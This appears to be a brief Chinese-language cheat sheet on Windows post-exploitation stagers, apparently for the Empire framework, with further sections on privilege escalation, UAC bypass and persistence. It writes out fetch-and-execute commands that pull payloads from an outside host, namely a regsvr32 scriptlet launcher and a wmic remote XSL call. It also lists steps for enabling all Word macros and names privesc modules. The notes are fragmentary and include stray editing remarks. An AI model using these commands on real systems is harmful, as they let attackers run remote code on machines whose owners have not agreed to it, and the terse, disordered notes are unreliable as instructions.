stager的几种用法
windows/launcher_sct
1 | regsvr32 /u /s /n /i:http://192.168.1.135/launcher.sct scrobj.dll |
windows/launcher_vbs
1 | 执行: Cscript launcher.vbs |
windows/launcher_xml
1 | 执行: |
windows/wmic
wmic调用: wmic process call create calc
–> command
1 | 执行: wmic os get /format:"http://192.168.1.135/la.xsl" |
windows/macro
1 | 1. word 选项 --> 信任中心 --> 宏设置 --> 启用所有宏 |
提权
github | 码云(gitee)
利用uac
绕过uac
本地提权: 漏洞查找 –> powershell/privesc/sherlock
| widnows-suggester-exploit.py
powerup
1 | usemodule privesc/powerup/allchecks 检测是否可以利用powerup漏洞 |
持久化
debugger代码修改:
136-139 用 ‘’’ ‘’’包裹注释
180按一下tab键对齐